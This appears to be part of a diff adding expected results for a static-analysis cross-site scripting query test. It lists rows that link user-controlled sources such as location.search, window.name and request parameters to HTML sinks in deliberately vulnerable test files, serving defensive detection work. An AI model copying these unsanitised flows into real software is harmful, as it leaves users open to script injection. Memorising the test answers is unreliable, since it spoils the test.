| window.location.hash | user-provided value | +| dragAndDrop.ts:15:25:15:28 | html | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | dragAndDrop.ts:15:25:15:28 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:8:18:8:50 | dataTra ... /html') | user-provided value | +| dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:24:23:24:57 | e.dataT ... /html') | user-provided value | +| dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:29:19:29:53 | e.dataT ... /html') | user-provided value | +| dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:33:19:33:67 | e.origi ... /html') | user-provided value | +| dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | +| dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | +| event-handler-receiver.js:2:31:2:83 | '

    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | +| express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:6:15:6:33 | req.param("wobble") | user-provided value | +| jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | +| jquery.js:14:19:14:58 | decodeU ... n.hash) | jquery.js:14:38:14:57 | window.location.hash | jquery.js:14:19:14:58 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | jquery.js:14:38:14:57 | window.location.hash | user-provided value | +| jquery.js:15:19:15:60 | decodeU ... search) | jquery.js:15:38:15:59 | window. ... .search | jquery.js:15:19:15:60 | decodeU ... search) | Cross-site scripting vulnerability due to $@. | jquery.js:15:38:15:59 | window. ... .search | user-provided value | +| jquery.js:16:19:16:64 | decodeU ... ring()) | jquery.js:16:38:16:52 | window.location | jquery.js:16:19:16:64 | decodeU ... ring()) | Cross-site scripting vulnerability due to $@. | jquery.js:16:38:16:52 | window.location | user-provided value | +| jquery.js:21:5:21:21 | hash.substring(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:21:5:21:21 | hash.substring(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:22:5:22:25 | hash.su ... (1, 10) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:22:5:22:25 | hash.su ... (1, 10) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:23:5:23:18 | hash.substr(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:23:5:23:18 | hash.substr(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:24:5:24:17 | hash.slice(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:24:5:24:17 | hash.slice(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:27:5:27:25 | hash.re ... #', '') | jquery.js:18:14:18:33 | window.location.hash | jquery.js:27:5:27:25 | hash.re ... #', '') | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:28:5:28:43 | window. ... ?', '') | jquery.js:28:5:28:26 | window. ... .search | jquery.js:28:5:28:43 | window. ... ?', '') | Cross-site scripting vulnerability due to $@. | jquery.js:28:5:28:26 | window. ... .search | user-provided value | +| jquery.js:34:5:34:25 | '' + ... '' | jquery.js:18:14:18:33 | window.location.hash | jquery.js:34:5:34:25 | '' + ... '' | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | +| jquery.js:36:25:36:31 | tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:36:25:36:31 | tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | +| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | +| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | +| jwt-server.js:10:19:10:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:10:19:10:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | +| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | +| optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:17:20:17:20 | x | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:17:20:17:20 | x | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:32:18:32:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:32:18:32:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:36:18:36:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:36:18:36:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:39:18:39:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:39:18:39:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:43:18:43:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:43:18:43:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:45:18:45:56 | sanitiz ... target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | +| pages/[id].jsx:10:44:10:45 | id | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:10:44:10:45 | id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:5:18:5:29 | router.query | user-provided value | +| pages/[id].jsx:13:44:13:52 | params.id | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:13:44:13:52 | params.id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:25:11:25:24 | context.params | user-provided value | +| pages/[id].jsx:16:44:16:51 | params.q | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:16:44:16:51 | params.q | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:26:10:26:22 | context.query | user-provided value | +| react-native.js:8:18:8:24 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:18:8:24 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-native.js:9:27:9:33 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:9:27:9:33 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | +| react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:10:22:10:32 | window.name | user-provided value | +| react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:16:26:16:36 | window.name | user-provided value | +| react-use-router.js:8:21:8:39 | router.query.foobar | react-use-router.js:8:21:8:32 | router.query | react-use-router.js:8:21:8:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:8:21:8:32 | router.query | user-provided value | +| react-use-router.js:11:24:11:42 | router.query.foobar | react-use-router.js:11:24:11:35 | router.query | react-use-router.js:11:24:11:42 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:11:24:11:35 | router.query | user-provided value | +| react-use-router.js:23:43:23:61 | router.query.foobar | react-use-router.js:23:43:23:54 | router.query | react-use-router.js:23:43:23:61 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:23:43:23:54 | router.query | user-provided value | +| react-use-router.js:33:21:33:39 | router.query.foobar | react-use-router.js:33:21:33:32 | router.query | react-use-router.js:33:21:33:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:33:21:33:32 | router.query | user-provided value | +| react-use-state.js:5:51:5:55 | state | react-use-state.js:4:38:4:48 | window.name | react-use-state.js:5:51:5:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:4:38:4:48 | window.name | user-provided value | +| react-use-state.js:11:51:11:55 | state | react-use-state.js:10:14:10:24 | window.name | react-use-state.js:11:51:11:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:10:14:10:24 | window.name | user-provided value | +| react-use-state.js:17:51:17:55 | state | react-use-state.js:16:20:16:30 | window.name | react-use-state.js:17:51:17:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:16:20:16:30 | window.name | user-provided value | +| react-use-state.js:23:35:23:38 | prev | react-use-state.js:25:20:25:30 | window.name | react-use-state.js:23:35:23:38 | prev | Cross-site scripting vulnerability due to $@. | react-use-state.js:25:20:25:30 | window.name | user-provided value | +| sanitiser.js:23:21:23:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:23:21:23:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:30:21:30:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:30:21:30:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:33:21:33:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:33:21:33:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:38:21:38:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:38:21:38:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:45:21:45:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:45:21:45:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| sanitiser.js:48:19:48:46 | tainted ... /g, '') | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:48:19:48:46 | tainted ... /g, '') | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | +| stored-xss.js:5:20:5:52 | session ... ssion') | stored-xss.js:2:39:2:62 | documen ... .search | stored-xss.js:5:20:5:52 | session ... ssion') | Cross-site scripting vulnerability due to $@. | stored-xss.js:2:39:2:62 | documen ... .search | user-provided value | +| stored-xss.js:8:20:8:48 | localSt ... local') | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:8:20:8:48 | localSt ... local') | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | +| stored-xss.js:12:20:12:54 | "" | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:12:20:12:54 | "" | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | +| string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | Cross-site scripting vulnerability due to $@. | string-manipulations.js:3:16:3:32 | document.location | user-provided value | +| string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | Cross-site scripting vulnerability due to $@. | string-manipulations.js:4:16:4:37 | documen ... on.href | user-provided value | +| string-manipulations.js:5:16:5:47 | documen ... lueOf() | string-manipulations.js:5:16:5:37 | documen ... on.href | string-manipulations.js:5:16:5:47 | documen ... lueOf() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:5:16:5:37 | documen ... on.href | user-provided value | +| string-manipulations.js:6:16:6:43 | documen ... f.sup() | string-manipulations.js:6:16:6:37 | documen ... on.href | string-manipulations.js:6:16:6:43 | documen ... f.sup() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:6:16:6:37 | documen ... on.href | user-provided value | +| string-manipulations.js:7:16:7:51 | documen ... rCase() | string-manipulations.js:7:16:7:37 | documen ... on.href | string-manipulations.js:7:16:7:51 | documen ... rCase() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:7:16:7:37 | documen ... on.href | user-provided value | +| string-manipulations.js:8:16:8:48 | documen ... mLeft() | string-manipulations.js:8:16:8:37 | documen ... on.href | string-manipulations.js:8:16:8:48 | documen ... mLeft() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:8:16:8:37 | documen ... on.href | user-provided value | +| string-manipulations.js:9:16:9:58 | String. ... n.href) | string-manipulations.js:9:36:9:57 | documen ... on.href | string-manipulations.js:9:16:9:58 | String. ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:9:36:9:57 | documen ... on.href | user-provided value | +| string-manipulations.js:10:16:10:45 | String( ... n.href) | string-manipulations.js:10:23:10:44 | documen ... on.href | string-manipulations.js:10:16:10:45 | String( ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:10:23:10:44 | documen ... on.href | user-provided value | +| tainted-url-suffix-arguments.js:6:22:6:22 | y | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | tainted-url-suffix-arguments.js:6:22:6:22 | y | Cross-site scripting vulnerability due to $@. | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | user-provided value | +| tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | +| tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | +| tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | +| translate.js:8:27:8:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:8:27:8:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | +| trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | +| trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | +| tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:5:26:5:31 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:5:26:5:31 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst.js:4:18:4:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:4:18:4:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:6:18:6:126 | "" | tst.js:6:37:6:58 | documen ... on.href | tst.js:6:18:6:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:6:37:6:58 | documen ... on.href | user-provided value | +| tst.js:9:5:9:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:9:5:9:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:15:18:15:35 | params.get('name') | tst.js:14:25:14:41 | document.location | tst.js:15:18:15:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:14:25:14:41 | document.location | user-provided value | +| tst.js:18:18:18:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:18:18:18:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:22:18:22:23 | target | tst.js:24:5:24:28 | documen ... .search | tst.js:22:18:22:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:24:5:24:28 | documen ... .search | user-provided value | +| tst.js:29:16:29:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:34:16:34:44 | baz(doc ... search) | tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:34:20:34:43 | documen ... .search | user-provided value | +| tst.js:39:16:39:45 | wrap(do ... search) | tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:39:21:39:44 | documen ... .search | user-provided value | +| tst.js:46:16:46:45 | chop(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | +| tst.js:47:16:47:45 | chop(do ... search) | tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:47:21:47:44 | documen ... .search | user-provided value | +| tst.js:48:16:48:32 | wrap(chop(bar())) | tst.js:27:10:27:33 | documen ... .search | tst.js:48:16:48:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:53:25:53:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:53:25:53:48 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:54:25:54:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:54:25:54:48 | documen ... .search | user-provided value | +| tst.js:56:16:56:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:60:20:60:20 | x | tst.js:58:3:58:26 | documen ... .search | tst.js:60:20:60:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:58:3:58:26 | documen ... .search | user-provided value | +| tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:63:49:63:72 | documen ... .search | user-provided value | +| tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:67:26:67:49 | documen ... .search | user-provided value | +| tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:68:25:68:48 | documen ... .search | user-provided value | +| tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:70:33:70:56 | documen ... .search | user-provided value | +| tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:71:32:71:55 | documen ... .search | user-provided value | +| tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:76:39:76:62 | documen ... .search | user-provided value | +| tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:30:82:53 | documen ... .search | user-provided value | +| tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:88:25:88:48 | documen ... .search | user-provided value | +| tst.js:95:18:95:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:95:18:95:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:120:18:120:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:120:18:120:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:135:49:135:49 | v | tst.js:132:29:132:50 | window. ... .search | tst.js:135:49:135:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:132:29:132:50 | window. ... .search | user-provided value | +| tst.js:139:29:139:46 | xssSourceService() | tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:142:40:142:61 | window. ... .search | user-provided value | +| tst.js:164:28:164:33 | target | tst.js:161:18:161:41 | documen ... .search | tst.js:164:28:164:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:161:18:161:41 | documen ... .search | user-provided value | +| tst.js:170:31:170:37 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:170:31:170:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:172:42:172:48 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:172:42:172:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:173:33:173:39 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:173:33:173:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:175:54:175:60 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:175:54:175:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:176:45:176:51 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:176:45:176:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:177:49:177:55 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:177:49:177:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:183:67:183:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:183:67:183:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:184:67:184:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:184:67:184:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:196:28:196:46 | this.state.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:196:28:196:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:197:28:197:46 | this.state.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:197:28:197:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:198:28:198:46 | this.state.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:198:28:198:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:202:32:202:49 | prevState.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:202:32:202:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:209:28:209:46 | this.props.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:209:28:209:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:210:28:210:46 | this.props.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:210:28:210:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:211:28:211:46 | this.props.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:211:28:211:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:215:32:215:49 | prevProps.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:215:32:215:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:235:60:235:82 | this.st ... Tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:235:60:235:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:243:7:243:17 | window.name | user-provided value | +| tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:244:7:244:10 | name | user-provided value | +| tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:248:11:248:21 | window.name | user-provided value | 